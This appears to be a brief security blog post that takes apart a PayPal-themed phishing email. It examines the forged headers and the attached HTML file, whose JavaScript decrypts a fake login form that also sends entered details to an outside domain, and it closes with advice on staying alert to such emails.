Phishing under PayPal cover

We would like to analyze a simple case of phishing and will look at the following e-mail:

What information do we seem to get from this e-mail?

1. This e-mail was allegedly sent by PayPal.

2. It says that your PayPal account has been blocked, but you may restore it by opening an html-file following the “instructions”.

3. The html-file is attached.

To start with, let’s look at the headers:

Return-Path: <Ѓg>

Received: from smtp.dentalcremer.com.br ([189.16.55.211]) by mx.unitymail.biz

(8.14.7/8.14.7) with ESMTP id u52FCIcl007805 for <user@target.ua>; Thu, 2

Jun 2016 18:12:19 +0300

Date: Thu, 2 Jun 2016 18:12:18 +0300

Received: from 125.111.65.140 ([189.16.55.211]) by smtp.dentalcremer.com.br

with Microsoft SMTPSVC(8.5.9600.16384); Thu, 2 Jun 2016 11:55:06 -0300

From: PayPal <accounts@locked.com>

Subject: Your Account Has Been Limited

Message-ID: <d0db17bebc199e2d1030d28d415bfcd7accounts@locked.com>

Content-Type: multipart/mixed; boundary="9b53dcd6f3cb7f23731e8f4a851ac1a1"

To: undisclosed-recipients:;

MIME-Version: 1.0

Even this superficial inspection shows that the e-mail was not sent by PayPal:

If we had been more careless and run the attached file, we would have seen the following:

We see an alleged page for restoring our PayPal account, where we have to complete a form by entering our personal details (including our password!).

Let’s look at the file on the inside. We can see that part of the html-code is encrypted. In this way, the intruder is concealing the malicious code. Also, the file contains a JavaScript-code which, if you run the file, decrypts the malicious part of the code.

On the screenshot below, we can see the part of the encrypted html-page:

The next screenshot demonstrates the decrypting mechanism written in JavaScript:

In the html-page decrypting mechanism, we can find the line responsible for running the decrypted html-page:

Let’s change part of the JavaScript-code by depriving it of the possibility to run:

As a result, we will get a safe way to study the decrypted html-page code.

In the decrypted code, we will see that all the information from the fields to be completed is sent to the official PayPal website:

However, if we further look at the JavaScript-code, we will see that all the information from the field to be completed is also sent to www.demograph2.net/...php, which certainly is not related to PayPal in any way:

Next, let’s find the IP-address this domain was assigned to in the past. To do this, we may use the following resource, for example: (http://www.tcpiputils.com/)

We also can see what domains were assigned to this IP-address before. As you can see, most of them had stories with improper activities, including Hacking, Port Scanning, Brute-Force, dDos, Forum Spam, Ping of Death:

Stay alert when you check your e-mails, especially when it’s about credit cards or bank accounts. Pay special attention to the link in the address line which is used to request your personal data.

Hopefully this article was helpful.